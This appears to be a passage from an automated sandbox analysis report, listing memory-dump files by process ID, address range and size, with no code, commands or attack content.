memory/4848-218-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/4848-269-0x0000000005820000-0x000000000585C000-memory.dmpFilesize
240KB
-
memory/4872-276-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/4872-273-0x0000000000403BEE-mapping.dmp
-
memory/4872-272-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/4924-349-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/4924-340-0x0000000000000000-mapping.dmp
-
memory/4948-223-0x0000000000000000-mapping.dmp
-
memory/4972-233-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4972-236-0x000000000040C76E-mapping.dmp
-
memory/4972-239-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/5012-789-0x0000000000000000-mapping.dmp
-
memory/5028-259-0x0000000000000000-mapping.dmp
-
memory/5044-242-0x00000000051E0000-0x000000000521D000-memory.dmpFilesize
244KB
-
memory/5044-206-0x0000000000000000-mapping.dmp
-
memory/5044-209-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/5044-210-0x00000000005E0000-0x00000000005E1000-memory.dmpFilesize
4KB
-
memory/5052-177-0x000000000041A684-mapping.dmp
-
memory/5056-318-0x0000000000000000-mapping.dmp
-
memory/5056-324-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/5072-101-0x0000000000000000-mapping.dmp
-
memory/5080-162-0x0000000000000000-mapping.dmp
-
memory/5112-321-0x0000000000000000-mapping.dmp
-
memory/5112-329-0x00007FFC35450000-0x00007FFC35E3C000-memory.dmpFilesize
9.9MB
-
memory/5124-776-0x0000000000000000-mapping.dmp
-
memory/5224-786-0x0000000000000000-mapping.dmp
-
memory/5224-791-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/5296-439-0x0000000000000000-mapping.dmp
-
memory/5296-516-0x0000000000000000-mapping.dmp
-
memory/5296-602-0x0000000000000000-mapping.dmp
-
memory/5296-606-0x0000000000000000-mapping.dmp
-
memory/5296-609-0x0000000000000000-mapping.dmp
-
memory/5296-612-0x0000000000000000-mapping.dmp
-
memory/5296-614-0x0000000000000000-mapping.dmp
-
memory/5296-592-0x0000000000000000-mapping.dmp
-
memory/5296-618-0x0000000000000000-mapping.dmp
-
memory/5296-589-0x0000000000000000-mapping.dmp
-
memory/5296-621-0x0000000000000000-mapping.dmp
-
memory/5296-374-0x0000000001230000-0x0000000001231000-memory.dmpFilesize
4KB
-
memory/5296-586-0x0000000000000000-mapping.dmp
-
memory/5296-581-0x0000000000000000-mapping.dmp
-
memory/5296-626-0x0000000000000000-mapping.dmp
-
memory/5296-575-0x0000000000000000-mapping.dmp
-
memory/5296-573-0x0000000000000000-mapping.dmp
-
memory/5296-629-0x0000000000000000-mapping.dmp
-
memory/5296-632-0x0000000000000000-mapping.dmp
-
memory/5296-634-0x0000000000000000-mapping.dmp
-
memory/5296-636-0x0000000000000000-mapping.dmp
-
memory/5296-638-0x0000000000000000-mapping.dmp
-
memory/5296-640-0x0000000000000000-mapping.dmp
-
memory/5296-643-0x0000000000000000-mapping.dmp
-
memory/5296-645-0x0000000000000000-mapping.dmp
-
memory/5296-375-0x0000000000000000-mapping.dmp
-
memory/5296-376-0x00000000012F0000-0x00000000012F1000-memory.dmpFilesize
4KB
-
memory/5296-377-0x0000000000000000-mapping.dmp
-
memory/5296-649-0x0000000000000000-mapping.dmp
-
memory/5296-654-0x0000000000000000-mapping.dmp
-
memory/5296-379-0x0000000000000000-mapping.dmp
-
memory/5296-569-0x0000000000000000-mapping.dmp
-
memory/5296-657-0x0000000000000000-mapping.dmp
-
memory/5296-660-0x0000000000000000-mapping.dmp
-
memory/5296-663-0x0000000000000000-mapping.dmp
-
memory/5296-381-0x0000000000000000-mapping.dmp
-
memory/5296-666-0x0000000000000000-mapping.dmp
-
memory/5296-563-0x0000000000000000-mapping.dmp
-
memory/5296-383-0x0000000000000000-mapping.dmp
-
memory/5296-671-0x0000000000000000-mapping.dmp
-
memory/5296-561-0x0000000000000000-mapping.dmp
-
memory/5296-385-0x0000000000000000-mapping.dmp
-
memory/5296-680-0x0000000000000000-mapping.dmp
-
memory/5296-557-0x0000000000000000-mapping.dmp
-
memory/5296-552-0x0000000000000000-mapping.dmp
-
memory/5296-685-0x0000000000000000-mapping.dmp
-
memory/5296-387-0x0000000000000000-mapping.dmp
-
memory/5296-549-0x0000000000000000-mapping.dmp
-
memory/5296-544-0x0000000000000000-mapping.dmp
-
memory/5296-389-0x0000000000000000-mapping.dmp
-
memory/5296-391-0x0000000000000000-mapping.dmp
-
memory/5296-541-0x0000000000000000-mapping.dmp
-
memory/5296-539-0x0000000000000000-mapping.dmp
-
memory/5296-693-0x0000000000000000-mapping.dmp
-
memory/5296-703-0x0000000000000000-mapping.dmp
-
memory/5296-537-0x0000000000000000-mapping.dmp
-
memory/5296-393-0x0000000000000000-mapping.dmp
-
memory/5296-535-0x0000000000000000-mapping.dmp
-
memory/5296-708-0x0000000000000000-mapping.dmp
-
memory/5296-532-0x0000000000000000-mapping.dmp
-
memory/5296-714-0x0000000000000000-mapping.dmp
-
memory/5296-395-0x0000000000000000-mapping.dmp
-
memory/5296-718-0x0000000000000000-mapping.dmp
-
memory/5296-530-0x0000000000000000-mapping.dmp
-
memory/5296-722-0x0000000000000000-mapping.dmp
-
memory/5296-726-0x0000000000000000-mapping.dmp
-
memory/5296-729-0x0000000000000000-mapping.dmp
-
memory/5296-397-0x0000000000000000-mapping.dmp
-
memory/5296-732-0x0000000000000000-mapping.dmp
-
memory/5296-735-0x0000000000000000-mapping.dmp
-
memory/5296-737-0x0000000000000000-mapping.dmp
-
memory/5296-740-0x0000000000000000-mapping.dmp
-
memory/5296-528-0x0000000000000000-mapping.dmp
-
memory/5296-742-0x0000000000000000-mapping.dmp
-
memory/5296-526-0x0000000000000000-mapping.dmp
-
memory/5296-524-0x0000000000000000-mapping.dmp
-
memory/5296-522-0x0000000000000000-mapping.dmp
-
memory/5296-520-0x0000000000000000-mapping.dmp
-
memory/5296-518-0x0000000000000000-mapping.dmp
-
memory/5296-599-0x0000000000000000-mapping.dmp
-
memory/5296-514-0x0000000000000000-mapping.dmp
-
memory/5296-512-0x0000000000000000-mapping.dmp
-
memory/5296-509-0x0000000000000000-mapping.dmp
-
memory/5296-506-0x0000000000000000-mapping.dmp
-
memory/5296-756-0x0000000000000000-mapping.dmp
-
memory/5296-760-0x0000000000000000-mapping.dmp
-
memory/5296-504-0x0000000000000000-mapping.dmp
-
memory/5296-765-0x0000000000000000-mapping.dmp
-
memory/5296-769-0x0000000000000000-mapping.dmp
-
memory/5296-399-0x0000000000000000-mapping.dmp
-
memory/5296-501-0x0000000000000000-mapping.dmp
-
memory/5296-772-0x0000000007840000-0x0000000007841000-memory.dmpFilesize
4KB
-
memory/5296-774-0x0000000000000000-mapping.dmp
-
memory/5296-497-0x0000000000000000-mapping.dmp
-
memory/5296-493-0x0000000000000000-mapping.dmp
-
memory/5296-401-0x0000000000000000-mapping.dmp
-
memory/5296-488-0x0000000000000000-mapping.dmp
-
memory/5296-481-0x0000000000000000-mapping.dmp
-
memory/5296-403-0x0000000000000000-mapping.dmp
-
memory/5296-407-0x0000000000000000-mapping.dmp
-
memory/5296-479-0x0000000000000000-mapping.dmp
-
memory/5296-477-0x0000000000000000-mapping.dmp
-
memory/5296-475-0x0000000000000000-mapping.dmp
-
memory/5296-473-0x0000000000000000-mapping.dmp
-
memory/5296-471-0x0000000000000000-mapping.dmp
-
memory/5296-469-0x0000000000000000-mapping.dmp
-
memory/5296-411-0x0000000000000000-mapping.dmp
-
memory/5296-465-0x0000000000000000-mapping.dmp
-
memory/5296-414-0x0000000000000000-mapping.dmp
-
memory/5296-462-0x0000000000000000-mapping.dmp
-
memory/5296-460-0x0000000000000000-mapping.dmp
-
memory/5296-457-0x0000000000000000-mapping.dmp
-
memory/5296-454-0x0000000000000000-mapping.dmp
-
memory/5296-417-0x0000000000000000-mapping.dmp
-
memory/5296-452-0x0000000000000000-mapping.dmp
-
memory/5296-450-0x0000000000000000-mapping.dmp
-
memory/5296-447-0x0000000000000000-mapping.dmp
-
memory/5296-445-0x0000000000000000-mapping.dmp
-
memory/5296-443-0x0000000000000000-mapping.dmp
-
memory/5296-421-0x0000000000000000-mapping.dmp
-
memory/5296-441-0x0000000000000000-mapping.dmp
-
memory/5296-423-0x0000000000000000-mapping.dmp
-
memory/5296-426-0x0000000000000000-mapping.dmp
-
memory/5296-437-0x0000000000000000-mapping.dmp
-
memory/5296-431-0x0000000000000000-mapping.dmp
-
memory/5296-435-0x0000000000000000-mapping.dmp
-
memory/5296-433-0x0000000000000000-mapping.dmp
-
memory/5372-482-0x0000000000000000-mapping.dmp
-
memory/5372-494-0x0000000000280000-0x0000000000281000-memory.dmpFilesize
4KB
-
memory/5372-486-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/5372-677-0x0000000007E80000-0x0000000007ED9000-memory.dmpFilesize
356KB
-
memory/5440-800-0x0000000000000000-mapping.dmp
-
memory/5476-696-0x0000000000403BEE-mapping.dmp
-
memory/5476-704-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/5496-598-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/5496-593-0x0000000000000000-mapping.dmp
-
memory/5548-594-0x0000000000000000-mapping.dmp
-
memory/5660-811-0x0000000000000000-mapping.dmp
-
memory/5660-820-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/5668-792-0x0000000004AC0000-0x0000000004B11000-memory.dmpFilesize
324KB
-
memory/5668-564-0x0000000000000000-mapping.dmp
-
memory/5668-674-0x0000000002A80000-0x0000000002ADC000-memory.dmpFilesize
368KB
-
memory/5688-833-0x0000000000000000-mapping.dmp
-
memory/5688-841-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/5832-650-0x000000000040C76E-mapping.dmp
-
memory/5832-653-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/5836-824-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/5836-818-0x0000000000000000-mapping.dmp
-
memory/6024-770-0x0000000008090000-0x0000000008091000-memory.dmpFilesize
4KB
-
memory/6024-711-0x0000000000000000-mapping.dmp
-
memory/6024-728-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/6024-787-0x0000000008790000-0x0000000008791000-memory.dmpFilesize
4KB
-
memory/6024-819-0x0000000009800000-0x0000000009801000-memory.dmpFilesize
4KB
-
memory/6116-548-0x0000000070A90000-0x000000007117E000-memory.dmpFilesize
6.9MB
-
memory/6116-543-0x0000000000000000-mapping.dmp
-
memory/6132-846-0x00007FFC35220000-0x00007FFC35C0C000-memory.dmpFilesize
9.9MB
-
memory/6132-839-0x0000000000000000-mapping.dmp